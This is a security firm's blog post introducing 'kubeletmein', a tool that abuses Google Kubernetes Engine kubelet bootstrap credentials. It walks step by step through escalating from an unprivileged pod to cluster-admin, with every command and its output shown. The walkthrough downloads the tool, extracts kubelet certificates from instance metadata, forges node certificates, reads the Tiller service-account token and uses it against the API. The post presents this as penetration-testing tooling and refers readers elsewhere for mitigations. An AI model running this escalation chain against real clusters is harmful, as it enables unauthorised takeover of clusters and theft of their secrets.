Kubeletmein - A tool for abusing kubelet credentials


Author Marc Wickenden

Date 6 December 2018

Kubeletmein is a simple tool to exploit cloud provider kubelet TLS bootstrapping techniques and escalate privileges within a Kubernetes cluster.

To fully understand the background to this tool please read our blog post on Kubelet hacking on GKE.

Introduction

Kubeletmein is a single go binary that you can pull down into your compromised GKE pod and it’ll read the metadata instance attributes, generate CSRs and submit them for you, then write out a kubeconfig file you can use with kubectl. It saves a lot of messing about with curl and openssl commands, both of which may not be available to you in your compromised container.

The source and compiled releases can all be found on our GitHub at https://github.com/4armed/kubeletmein. Pull requests are welcome.

Google Kubernetes Engine Demonstration

Set up a demo cluster

Let’s fire up a quick cluster on Google Kubernetes Engine to try this out. The following steps assume you’ve got a Google Cloud account with billing enabled, a project set up and credentials activated on your workstation. Head to https://cloud.google.com/ if you need to do this. There’s a generous introductory credit offer if you want to play around.

If you accept all the defaults for a standard cluster in the Cloud Console, at the time of writing, you’ll end up with a command line equivalent as follows. The only thing I did change was:

  • Disable HTTP Basic Authentication
  • Disable Client Certificate
  • Enable auto-scaling with a node pool minimum of 1 and maximum of 3
  • Use preemptible nodes

We’ll run this to get up and running.

$ gcloud beta container clusters create "cluster0" --zone "us-central1-a" --no-enable-basic-auth --cluster-version "1.9.7-gke.11" --machine-type "n1-standard-1" --image-type "COS" --disk-type "pd-standard" --disk-size "100" --scopes "https://www.googleapis.com/auth/compute","https://www.googleapis.com/auth/devstorage.read_only","https://www.googleapis.com/auth/logging.write","https://www.googleapis.com/auth/monitoring","https://www.googleapis.com/auth/servicecontrol","https://www.googleapis.com/auth/service.management.readonly","https://www.googleapis.com/auth/trace.append" --preemptible --num-nodes "1" --enable-cloud-logging --enable-cloud-monitoring --no-enable-ip-alias --network "default" --subnetwork "default" --enable-autoscaling --min-nodes "1" --max-nodes "3" --addons HorizontalPodAutoscaling,HttpLoadBalancing,KubernetesDashboard --enable-autoupgrade --enable-autorepair

It lives.

Creating cluster cluster0 in us-central1-a...done.
kubeconfig entry generated for cluster0.
NAME      LOCATION       MASTER_VERSION  MASTER_IP     MACHINE_TYPE   NODE_VERSION  NUM_NODES  STATUS
cluster0  us-central1-a  1.9.7-gke.11    35.188.62.53  n1-standard-1  1.9.7-gke.11  3          RUNNING

To make life interesting and give ourselves something to attack, let’s install Helm. If you need fuller instructions on Helm head over to https://docs.helm.sh/using_helm/#installing-helm. Here I will just quickly set up RBAC permissions and install the Tiller.

$ kubectl create -f - <<EOF
apiVersion: v1
kind: ServiceAccount
metadata:
  name: tiller
  namespace: kube-system
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: tiller
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: cluster-admin
subjects:
  - kind: ServiceAccount
    name: tiller
    namespace: kube-system
EOF
serviceaccount "tiller" created
clusterrolebinding.rbac.authorization.k8s.io "tiller" created

Install the Tiller.

$ helm init --service-account tiller
Tiller (the Helm server-side component) has been installed into your Kubernetes Cluster.

Please note: by default, Tiller is deployed with an insecure 'allow unauthenticated users' policy.
To prevent this, run `helm init` with the --tiller-tls-verify flag.
For more information on securing your installation see: https://docs.helm.sh/using_helm/#securing-your-helm-installation
Happy Helming!

Note the above output. Don’t ever do this in production, make sure you use TLS otherwise you’re at risk of cluster compromise. For our purposes, this will do for a demo. It’s also worth pointing out that TLS won’t prevent what we’re about to do. :-D

All set. Let’s test out kubeletmein.

Download and run kubeletmein

Now let’s run a container in our cluster and use this to exploit the kubelet creds with kubeletmein. Alpine Linux will work just fine.**

$ kubectl run -ti --image=alpine --attach alpine -- sh
If you don't see a command prompt, try pressing enter.
$

Small note, by default the above will give you a root prompt with a #. I’ve changed this as otherwise the bash syntax highlighting on this page shows all commands as a comment.

Let’s grab kubectl for use later.

$ wget https://storage.googleapis.com/kubernetes-release/release/$(wget -q -O - https://storage.googleapis.com/kubernetes-release/release/stable.txt)/
bin/linux/amd64/kubectl -O /usr/local/bin/kubectl && chmod +x /usr/local/bin/kubectl
Connecting to storage.googleapis.com (108.177.112.128:443)
kubectl              100% |*********************************************************************************************************************************| 38295k  0:00:00 ETA

Now download kubeletmein. The latest version at the time of writing is 0.5.3.

$ wget https://github.com/4ARMED/kubeletmein/releases/download/v0.5.3/kubeletmein_0.5.3_linux_amd64 -O /usr/local/bin/kubeletmein && chmod +x /usr/local/bin/kubeletmein
Connecting to github.com (192.30.253.112:443)
Connecting to github-production-release-asset-2e65be.s3.amazonaws.com (52.216.138.12:443)
kubeletmein          100% |*********************************************************************************************************************************| 21762k  0:00:00 ETA

The first thing we do is create a bootstrap-kubeconfig file which contains the kubelet key/cert from kube-env.

$ kubeletmein gke bootstrap
2018-12-06T13:43:26Z []  writing ca cert to: ca-certificates.crt
2018-12-06T13:43:26Z []  writing kubelet cert to: kubelet.crt
2018-12-06T13:43:26Z []  writing kubelet key to: kubelet.key
2018-12-06T13:43:26Z []  generating bootstrap-kubeconfig file at: bootstrap-kubeconfig
2018-12-06T13:43:26Z []  wrote bootstrap-kubeconfig
2018-12-06T13:43:26Z []  now generate a new node certificate with: kubeletmein gke generate

You can read the file if you want to. In the current directory, by default it’s called bootstrap-kubeconfig. You can override this if you wanted to with the -b flag.

Now generate a new cert. At this point, we don’t know our nodes names within the cluster so just use anything for the node name.

$ kubeletmein gke generate -n anything
2018-12-06T13:45:24Z []  using bootstrap-config to request new cert for node: anything
2018-12-06T13:45:24Z []  got new cert and wrote kubeconfig
2018-12-06T13:45:24Z []  now try: kubectl --kubeconfig kubeconfig get pods

That’s it. We now have a kubeconfig file in the current directory which has system:nodes access from the certificate in the ./pki directory. Test it out.

$ kubectl --kubeconfig kubeconfig get pods
NAME                              READY   STATUS    RESTARTS   AGE
alpine-5498978876-66bbs           1/1     Running   2          35m

Hacking Helm with kubelet creds

As we mentioned in our previous post, we can now retrieve secrets but only for nodes for which we have a certificate. This is where kubeletmein speeds up the process significantly as it will generate the csr, submit and create our kubeconfig for us.

Let’s find the location of the Tiller RBAC service account token secret.

$ kubectl --kubeconfig kubeconfig get pods -l app=helm,name=tiller -n kube-system -o wide
NAME                             READY   STATUS    RESTARTS   AGE   IP          NODE                                      NOMINATED NODE   READINESS GATES
tiller-deploy-5c99b8bcbf-w7xq5   1/1     Running   0          18m   10.36.1.8   gke-cluster0-default-pool-eb80ec96-9n9f   <none>           <none>

We can see that the Tiller is deployed to node gke-cluster0-default-pool-eb80ec96-9n9f so we need a node cert for that.

First delete the existing certs in the ./pki directory (by default).

$ rm pki/kubelet-client-*

Now generate the new one.

$ kubeletmein gke generate -n gke-cluster0-default-pool-eb80ec96-9n9f
2018-12-06T13:56:34Z []  using bootstrap-config to request new cert for node: gke-cluster0-default-pool-eb80ec96-9n9f
2018-12-06T13:56:34Z []  got new cert and wrote kubeconfig
2018-12-06T13:56:34Z []  now try: kubectl --kubeconfig kubeconfig get pods

We just wrote a new kubeconfig. We can now use this to read secrets from node gke-cluster0-default-pool-eb80ec96-9n9f.

$ kubectl --kubeconfig kubeconfig -n kube-system get pod tiller-deploy-5c99b8bcbf-w7xq5 -o jsonpath='{.spec.volumes[0].secret.secretName}{"\n"}'
tiller-token-mr4df

$ kubectl --kubeconfig kubeconfig -n kube-system get secret tiller-token-mr4df -o yaml
apiVersion: v1
data:
  ca.crt: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSURDekNDQWZPZ0F3SUJBZ0lR[..]SUNBVEUtLS0tLQo=
  namespace: a3ViZS1zeXN0ZW0=
  token: ZXlKaGJHY2lPaUpTVXpJMU5pSXNJblI1Y0NJNklrcFhWQ0o5LmV5SnBjM01pT2lKcmRXSmxjbTVsZEdW[..]dDFZbVV0YzNsemRHVnRPblJwYkd4bGNpSjkuTFpoRnNrUENZYVg2cWlhVDBTeElkRmZGWm9xSDR3eGIxdHhCWkt1UUF0QXpNWGtLaDV0Tnk4MGFOdWRxU0RibTZyNXVhZ21JU2xDejl3VVdrY3lzeVU2dkFWLUdRcWtmVDV4cHIxQy04dUJYZ3pxSmRvM19HZldGVUpfcnZnZTFkd3Y4MW5IcGtuOWV5RGczeWY1SENWYy03LWN1RnRUdHRQU3lqQ2ppLVB1ZnQwZXpkb1h0WmpjcUFXakg0dXgtdXh4TjJRM21tU01sVkFzZGpNQy1zUmk5Y0otTW8wWEc0V0Nab3NTRF9vaHhLZ3pfWmhNd3Q5MnRDRHpUcFkzR1V6NWxVTmZLeTY2NzhTcEZwMVF4YjZWVTJybXd6anQyMHQwXy1weWFMZHJtRHlLdEpEc2NnZ2xHMm1aUFdMZjBUUjdxdUc5NFZYbGNkam9Zd0V3aFVB
kind: Secret
metadata:
  annotations:
    kubernetes.io/service-account.name: tiller
    kubernetes.io/service-account.uid: 9cba9310-f95b-11e8-a788-42010a800192
  creationTimestamp: "2018-12-06T13:34:10Z"
  name: tiller-token-mr4df
  namespace: kube-system
  resourceVersion: "4240"
  selfLink: /api/v1/namespaces/kube-system/secrets/tiller-token-mr4df
  uid: 9cbc8029-f95b-11e8-a788-42010a800192
type: kubernetes.io/service-account-token

We can now view the secret object. The token is, like all Kubernetes secrets, base64 encoded. Let’s grab the token and decode it into a file.

$ kubectl --kubeconfig kubeconfig -n kube-system get secret tiller-token-mr4df -o jsonpath='{.data.token}' | base64 -d > tiller-token

Finally, we can use this token to access the API as the tiller service account.

$ kubectl --certificate-authority ca-certificates.crt --token `cat tiller-token` --server https://${KUBERNETES_PORT_443_TCP_ADDR} get secrets
NAME                     TYPE                                  DATA   AGE
default-token-cfbb5      kubernetes.io/service-account-token   3      66m
peeking-cardinal-mysql   Opaque                                2      28m

Summary

We are now cluster-admin on the Kubernetes cluster. Not bad from a non-privileged container that didn’t have openssl tools installed.

Kubeletmein is designed to help speed up the process of performing security audits of Kubernetes clusters. We use it in our penetration testing services.

Fortunately, it’s relatively straightforward to prevent this type of attack. Please see our kubelet hacking post for mitigation steps.

Share:

About The Author

Marc Wickenden

Technical Director at 4ARMED, you can blame him for our awesome technical skills and business-led solutions. You can tweet him at @marcwickenden.


Related Articles